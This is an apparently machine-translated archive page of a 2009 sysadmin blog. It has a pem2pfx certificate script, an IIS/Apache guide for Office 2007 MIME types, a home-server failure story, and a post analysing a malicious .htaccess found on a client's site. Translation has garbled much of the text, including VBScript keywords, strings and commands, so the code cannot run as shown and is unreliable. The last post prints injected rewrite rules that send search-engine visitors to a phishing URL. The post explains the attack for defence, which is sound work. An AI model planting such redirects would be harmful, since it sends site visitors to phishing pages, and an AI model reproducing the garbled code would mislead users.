برچسب آرشیو برای » دزد «

Wednesday, March 18th, 2009 | نویسنده:

[edit] So much for that. It turns out that openssl is able to determine that the key and certificate are already in a single file. Therefore, no csplitting required (خوب, I hope somebody reading this at least learned about how nice csplit is). In fact, the whole script might as well be obsoleteblaargh. Well, at least it gives a nice warning about not giving a blank passphrase. 😀

Here’s the new version:

pem2pfxconverts a .pem-formatted file containing a private key and signed certificate into a Windows-compatible .pfx certificate file.

#!/bin/bash
#pem2pfx
#v0.2
#مکار - bتحقیقeNdan@swمنftspirمنt.co.za
# Converts a .pem certificate file to .pfx format
# $1 is the source file
set -e
 
if [ $# = 1 ]; سپس
  outputfile=`echo $1 | sed 's/.pem$/.pfx/'`
 
  echo "Please specify a password below. Windows refuses to import a .pfx certificate with a blank password."
  openssl pkcs12 -export -out $outputfile -in $1
 
 else
  echo "pem2pfx - converts a .pem formatted private-key and certificate file to an IIS-compatible .pfx file."
  echo "Usage: pem2pfx inputfile.pem"
fi

بیشتر…

اشتراک گذاری
روز شنبه, فوریه 21, 2009 | نویسنده:

نوع سند نسبتا جدید دفتر 2007 تا به برخی از مشکلات وب سایت میزبان داده شده است زمانی که مشتریان خود می خواهند برای ارائه اسناد برای دانلود. در اکثر موارد, اسناد هستند که توسط وب سرور به عنوان ارائه “متن / اچ” است که پس از آن به عنوان یک تن از زباله ها بر روی صفحه نمایش کاربر وب را ارائه.

بهترین راه برای حل و فصل این است که اضافه کردن همه MIME انواع به تنظیمات اصلی سرور. IIS7 برای ویندوز در حال حاضر این نوع MIME به درستی راه اندازی به طور پیش فرض. IIS6 و IIS5 نیاز به انواع MIME به آن اضافه شود, به عنوان قدرت دزد در تاسیسات بزرگتر. برای آپاچی, نیز وجود دارد یک راه حل برای مالک دامنه های فردی برای اضافه کردن نوع MIME پرونده از طریق در آپاچی .htaccess تغییر نام دهید پرونده.

IIS 6 نوع MIME علاوه بر (برای مدیر سرور)

قبل از این می تواند انجام شود, اطمینان حاصل شود که سرور شما همچنین اجازه می دهد تا ویرایش فراویکی مستقیم:

  1. بار مدیر IIS: شروع -> Rسازمان ملل متحد, “inetmgr” -> [خوب]
  2. راست کلیک کنید “سرور” کلیک کنید و “Pتحقیقoperties”
  3. در “خدمات اطلاعات اینترنتی” برگ (معمولا تنها زبانه), اطمینان حاصل شود که “ENقادر مستقیم فراویکی ویرایش” گزینه بررسی می شود.
  4. کلیک کنید [خوب]

مطمئن باشید که به بالا و پیکربندی IIS در (اینجا برای IIS5) پیش. من هیچ مسئولیت یک مدیر شکستن سرور خود را ندارد. من دلیلی برای باور کردن این که ممکن است همچنین در IIS5 کار با این حال من دلیلی به همان اندازه به این باور است که آن را فقط ممکن را به مقدار زیادی از خطاهای. اگر IIS5 / ویندوز 2000 مدیر مایل به تست این برای من است بعد از پشتیبان گیری پیکربندی خود را لطفا اجازه دهید من از نتایج دانم.

متن زیر را در یک فایل به نام msoff07-addmime.vbs و آن را اجرا یک بار از خط فرمان با تایپ کردن cscript msoff07-addmime.vbs و را وارد کنید با فشار دادن. اگر شما آن را اجرا بیش از یک بار, انواع MIME اضافه خواهد شد هر زمان و شما چند ورودی یکسان دارند:

'این اسکریپت می افزاید: دفتر لازم 2007 نوع MIME به IIS 6 سرور.
"برای استفاده از این اسکریپت, فقط دوبار کلیک کنید و یا از خط فرمان آن را اجرا.
'در حال اجرا این اسکریپت چند بار نتایج در چند ورودی در
'IIS MimeMap بنابراین شما باید آن را اجرا کنید بیش از یک بار.
'اصلاح را از http://msdn.microsoft.com/en-us/library/ms752346.aspx
 
بدون MimeMapObj, MimeMapArray, MimeTypesToAddArray, WshShell, oExec
توایع ADS_PROPERTY_UPDATE = 2 
 
'تنظیم نوع MIME به آن اضافه شود
MimeTypesToAddArray = صف("docm.", "application/vnd.ms-word.document.macroEnabled.12", _
". های Docx", "نرم افزار / vnd.openxmlformats-officedocument.wordprocessingml.document", _
"dotm.", "application/vnd.ms-word.template.macroEnabled.12", _
"dotx.", "نرم افزار / vnd.openxmlformats-officedocument.wordprocessingml.template", _
"potm.", "application/vnd.ms-powerpoint.template.macroEnabled.12", _
"potx.", "نرم افزار / vnd.openxmlformats-officedocument.presentationml.template", _
"ppam.", "application/vnd.ms-powerpoint.addin.macroEnabled.12", _
". PPSM", "application/vnd.ms-powerpoint.slideshow.macroEnabled.12", _
". ppsx", "نرم افزار / vnd.openxmlformats-officedocument.presentationml.slideshow", _
"pptm.", "application/vnd.ms-powerpoint.presentation.macroEnabled.12", _
". PPTX", "نرم افزار / vnd.openxmlformats-officedocument.presentationml.presentation", _
"sldm.", "application/vnd.ms-powerpoint.slide.macroEnabled.12", _
"sldx.", "نرم افزار / vnd.openxmlformats-officedocument.presentationml.slide", _
". Xlam", "application/vnd.ms-excel.addin.macroEnabled.12", _
"xlsb.", "application/vnd.ms-excel.sheet.binary.macroEnabled.12", _
"xlsm.", "application/vnd.ms-excel.sheet.macroEnabled.12", _
". XLSX", "نرم افزار / vnd.openxmlformats-officedocument.spreadsheetml.sheet", _
"xltm.", "application/vnd.ms-excel.template.macroEnabled.12", _
"xltx.", "نرم افزار / vnd.openxmlformats-officedocument.spreadsheetml.template") 
 
دریافت شی mimemap
مجموعه MimeMapObj = GetObject("موضوعات://در localhost / MimeMap")
 
'تماس AddMimeType برای هر جفت از نوع فرمت / MIME
برای شمارنده = 0 به UBound(MimeTypesToAddArray) گام 2
    AddMimeType MimeTypesToAddArray(شمارنده), MimeTypesToAddArray(شمارنده+1)
بعد
 
"ایجاد یک شی شل
مجموعه WshShell = CreateObject("WScript.Shell")
 
'توقف و شروع سرویس IIS
مجموعه oExec = WshShell.EXEC("w3svc متوقف خالص")
از در حین oExec.وضعیت = 0
    Wscript دهی.خواب 100
حلقه
 
مجموعه oExec = WshShell.EXEC("w3svc شروع خالص")
از در حین oExec.وضعیت = 0
    Wscript دهی.خواب 100
حلقه
 
مجموعه oExec = هیچ
 
'گزارش وضعیت به کاربر
Wscript دهی.پژواک "دفتر مایکروسافت 2007 نوع سند MIME ثبت شده است."
 
'AddMimeType زیر
زیر AddMimeType (داخلی, MType)
 
    'دریافت نقشه های از اموال MimeMap.
    MimeMapArray = MimeMapObj.GetEx("MimeMap") 
 
    اضافه کردن جدید نقشه برداری.
    من = UBound(MimeMapArray) + 1
    Redim حفظ MimeMapArray(من)
    مجموعه MimeMapArray(من) = CreateObject("MimeMap")
    MimeMapArray(من).توسعه = داخلی
    MimeMapArray(من).نوعمایم = MType
    MimeMapObj.PutEx ADS_PROPERTY_UPDATE, "MimeMap", MimeMapArray
    MimeMapObj.SetInfo
 
پایان زیر

آپاچی MIME نوع علاوه بر (برای مدیر سرور)

آپاچی ذخیره انواع MIME خود را در یک فایل به طور معمول در واقع $installpath / کنفرانس / mime.types. مشاهده mod_mime مستندات برای اطلاعات بیشتر در چگونه کار می کند. آرچ لینوکس نصب انواع MIME خود را در /و غیره / HTTPD / کنفرانس / mime.types و نحوهی پلسک (Plesk) آن را نصب آن در /usr / محلی / PSA / مدیریت / کنفرانس / mime.types. توزیع شما ممکن است آن را در محل دیگری, بنابراین خود را پیدا کنید mime.types فایل های در حال اجرا قرار mime.types.

خطوط زیر را به فایل mime.types شما:

application/vnd.ms-word.document.macroEnabled.12                          docm
application/vnd.openxmlformats-officedocument.wordprocessingml.document   docx
application/vnd.ms-word.template.macroEnabled.12                          dotm
application/vnd.openxmlformats-officedocument.wordprocessingml.template   dotx
application/vnd.ms-powerpoint.template.macroEnabled.12                    potm
application/vnd.openxmlformats-officedocument.presentationml.template     potx
application/vnd.ms-powerpoint.addin.macroEnabled.12                       ppam
application/vnd.ms-powerpoint.slideshow.macroEnabled.12                   ppsm
application/vnd.openxmlformats-officedocument.presentationml.slideshow    ppsx
application/vnd.ms-powerpoint.presentation.macroEnabled.12                pptm
application/vnd.openxmlformats-officedocument.presentationml.presentation pptx
application/vnd.ms-powerpoint.slide.macroEnabled.12                       sldm
application/vnd.openxmlformats-officedocument.presentationml.slide        sldx
application/vnd.ms-excel.addin.macroEnabled.12                            xlam
application/vnd.ms-excel.sheet.binary.macroEnabled.12                     xlsb
application/vnd.ms-excel.sheet.macroEnabled.12                            xlsm
application/vnd.openxmlformats-officedocument.spreadsheetml.sheet         xlsx
application/vnd.ms-excel.template.macroEnabled.12                         xltm
application/vnd.openxmlformats-officedocument.spreadsheetml.template      xltx

آپاچی MIME نوع علاوه بر (برای صاحب دامنه با حداقل FTP دسترسی – با استفاده از فایل htaccess)

متن زیر را اضافه کردن به دامنه خود را .htaccess تغییر نام دهید پرونده, اغلب در httpdocs / دایرکتوری

AddType application/vnd.ms-word.document.macroEnabled.12 docm
AddType نرم افزار / vnd.openxmlformats-officedocument.wordprocessingml.document های docx
AddType application/vnd.ms-word.template.macroEnabled.12 dotm
AddType نرم افزار / vnd.openxmlformats-officedocument.wordprocessingml.template dotx
AddType potm application/vnd.ms-powerpoint.template.macroEnabled.12
AddType نرم افزار / vnd.openxmlformats-officedocument.presentationml.template potx
AddType application/vnd.ms-powerpoint.addin.macroEnabled.12 ppam
AddType application/vnd.ms-powerpoint.slideshow.macroEnabled.12 ppsm
AddType نرم افزار / vnd.openxmlformats-officedocument.presentationml.slideshow ppsx
AddType application/vnd.ms-powerpoint.presentation.macroEnabled.12 pptm
AddType نرم افزار / vnd.openxmlformats-officedocument.presentationml.presentation PPTX
AddType application/vnd.ms-powerpoint.slide.macroEnabled.12 sldm
AddType نرم افزار / vnd.openxmlformats-officedocument.presentationml.slide sldx
AddType application/vnd.ms-excel.addin.macroEnabled.12 xlam
AddType application/vnd.ms-excel.sheet.binary.macroEnabled.12 xlsb
AddType application/vnd.ms-excel.sheet.macroEnabled.12 xlsm
AddType نرم افزار / vnd.openxmlformats-officedocument.spreadsheetml.sheet XLSX
AddType application/vnd.ms-excel.template.macroEnabled.12 xltm
AddType نرم افزار / vnd.openxmlformats-officedocument.spreadsheetml.template xltx
اشتراک گذاری
Tuesday, February 17th, 2009 | نویسنده:

Some of you may already know that I built a home server not too long ago. I documented some of the very important parts of how it was built though I was planning on releasing all the documentation all at once. I was using Arch Linux and I hadn’t nearly finished everything, especially the documentation. مثلا, it was supposed to be a media server. After some disk shuffling, it was supposed to end up having a RAID1 for the boot and RAID 10 for the rest (the media part).

This didn’t work out at all.

I got as far as having an efficientخوبfirewalled) routing gateway server. I was finally satisfied that the customised local routing* was working correctly and I was confident that my tests with DHCP meant I could disable the DHCP service on the flimsy ADSL router and have all my flatmates start using the server as the Internet دروازه. Instead: I was logged in to the server from the office, I’d just installed Apache2**, and I was about to consult with a colleague regarding getting nice graphs put together so the flatmates could all see who was using up the bandwidth***when I noticed a little message indicating that the root filesystem had been remounted read-only due to some or other disk failure.

And then I lost my connection to the server.

And then I gained a foul mood.

🙁

When I arrived home, I found that, as I had guessed from the descriptive message given at the office, the (بسیار) old 80GB IDE disk that I was using for the root filesystem had failed. Unfortunately, the server would never boot again and there was little chance of prying everything off onto another disk to continue where I’d left off.

I’m buying a replacement (SATA) HDD this next weekend just after pay dayand I’ve changed my mind about documenting my progressand backing up my configurations:

Release Early. Release Often.

* ISPs in South Africa charge less (easy price comparison) forlocal-only” (within South Africa) traffic on ADSL but only if you use an ADSL account that CANNOT access web services outside of South Africa. This means that if you want to take advantage of the reduced costs but still be able to access the Internet at large, you need to set up some sneaky routing.

** one-command-install: ~$ yaourt -S apache

*** Internet Access in SA is expensiveyou get charged about R70 ($7 / £4.9 / €5.46) per GB when using ADSL, or about R2 per MB if using GPRS / 3G.

اشتراک گذاری
پنج شنبه, January 22nd, 2009 | نویسنده:

I very recently found a problem with a client’s web site due to a .htaccess تغییر نام دهید پرونده. The site was hosted on a ویندوز server running IIS using IISPassword, which makes use of .htaccess تغییر نام دهید files for its settings.

IISPassword doesn’t follow exactly the same rules as with دزد however. If the .htaccess file exists then it must contain IISPassword-appropriate rules, otherwise the server returns only the following error:

Error 500 given by IIS Password
Here’s the content of the .htaccess file. I’ve only modified the final redirection URL to point to example.com appropriately:

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,یا]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,یا]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,یا]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,یا]
RewriteCond %{HTTP_REFERER} .*yandex.*$ [NC,یا]
RewriteCond %{HTTP_REFERER} .*rambler.*$ [NC,یا]
RewriteCond %{HTTP_REFERER} .*ya.*$ [NC]
RewriteRule .* HTTP://siffy-phishing-url.example.com [R,L]

If this were on a server running Apache with mod_rewrite, most web users would go directly to the correct site content. Only if they reached the site through the search engines and indexes listed in the .htaccess, would they be redirected to the siffy phishing url that the cracker wants victims to reach.

البته, the cracker (or perhaps even an automated worm) didn’t realise that the server in question didn’t even support these mod_rewrite rules. But either way, this is very worrying as I can foresee many arguments about whether or not the site is working

اشتراک گذاری